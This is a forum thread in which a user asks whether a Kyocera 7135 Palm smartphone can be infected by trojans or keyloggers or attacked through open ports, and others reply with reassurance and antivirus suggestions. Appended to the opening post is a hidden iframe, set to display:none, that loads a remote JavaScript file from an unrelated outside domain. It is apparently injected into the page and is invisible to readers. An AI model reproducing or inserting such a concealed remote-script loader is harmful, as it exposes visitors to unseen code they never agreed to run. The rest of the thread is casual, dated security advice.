+ Reply to Thread

Hackers, Viruses & Trojans on my 7135 ?! (Oh My!)

Hello All:
    This is my first post - this is an incredible forum. You guys know more than Verizon and Kyocera tech support combined !!!

My question:
    A friend had his laptop hacked, and they put a trojan on his hard drive - the trojan did what's called "keylogging". Scary stuff - they got some of his passwords. Luckily, no $ withdrawn from any accounts.

Can this happen on the 7135 ? (And I'm not talking about whether they can snoop on your over-airwaves traffic like they can with unsecured Wi-Fi networks). Could someone hack into an "open port" on my 7135, like they can with a computer ?

If so, is there a firewall program out there ? Also, is there anti-virus software for the 7135 ?

Worst case scenario: A virus messes up the 7135 - you do a "hard reset", right ? - as long as you're data is backed up

Thanks!!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It's not too likely a Palm gets infected, but there are Palm viruses and trojans out there.

Best thing is to make sure your antivirus software is current and up to date, and add PDB and PRC's to the types of files scanned by your PC antivirus software. This was you don't accidently sync a virus into it.

There isn't a PalmOS based anti-virus app, and I think Norton Antivirus is the only PC virus app that has the Palm viruses in it's scanner.

I actually used to useMcAfee VirusScan Wireless a while back... but sometime back when I had the 6035 I stopped using it for some reason. Probably because it was just taking up space I didn't have, and because I haven't yet heard of or read about a virus doing serious damage where a handheld was involved. And when that does happen it'll more than likely involve a PPC (Microsoft!)
    Please visit my picture site: Robert-O-Rama :)

Never thought of this. Might be more of an issue if there is a SD/WiFI or Bluetooth card that works.

There must be some hacke.... err I mean industrial person out there that may know morw about this. Anyone?
    Walt

Re: Hackers, Viruses & Trojans on my 7135 ?! (Oh My!)

Originally posted by RedSoxFan
    Hello All:
    This is my first post - this is an incredible forum. You guys know more than Verizon and Kyocera tech support combined !!!

My question:
    A friend had his laptop hacked, and they put a trojan on his hard drive - the trojan did what's called "keylogging". Scary stuff - they got some of his passwords. Luckily, no $ withdrawn from any accounts.

Can this happen on the 7135 ? (And I'm not talking about whether they can snoop on your over-airwaves traffic like they can with unsecured Wi-Fi networks). Could someone hack into an "open port" on my 7135, like they can with a computer ?

If so, is there a firewall program out there ? Also, is there anti-virus software for the 7135 ?

Worst case scenario: A virus messes up the 7135 - you do a "hard reset", right ? - as long as you're data is backed up

Thanks!!!
    I doubt the 7135 would have any ports open when connected to the net. There's no need for it, no one's going to connect to a cell device, a palm webserver? That being said, it's possible if you surfed to a malicious website, that the palm "browser" being used was vulnerable, that you could get hacked. But this is very rare since you'd have to surf to a hacker's site, not to mention hacker's wouldn't bother even trying since how many ppl actually surf with a palm browser? It would be a waste of time.

not too much to worry about

A virus would have to be written for palm OS in order to do considerable damage. A regular PC virus is written for the OS of the PC or another app. So, 99% of the viruses out there can't hurt your palm. But, the idea of making sure your Norton scans your palm files is very good. I will add that to my scan list.

As far as ports being scanned, I would doubt there would be any ports open on the 7135 except the Http port for web browsing. I can't speak to the security of wireless browsers, but I'm sure your IP could be grabbed if you were online in some way... this is an interesting topic... i hope this thread continues... very interesting..

Re: not too much to worry about

Originally posted by clintrob
    A virus would have to be written for palm OS in order to do considerable damage. A regular PC virus is written for the OS of the PC or another app. So, 99% of the viruses out there can't hurt your palm. But, the idea of making sure your Norton scans your palm files is very good. I will add that to my scan list.

As far as ports being scanned, I would doubt there would be any ports open on the 7135 except the Http port for web browsing. I can't speak to the security of wireless browsers, but I'm sure your IP could be grabbed if you were online in some way... this is an interesting topic... i hope this thread continues... very interesting..
    No ports have to be open on a device with an ip as long as nothing needs to connect to it. In order to browse, an incoming port 80 is not required.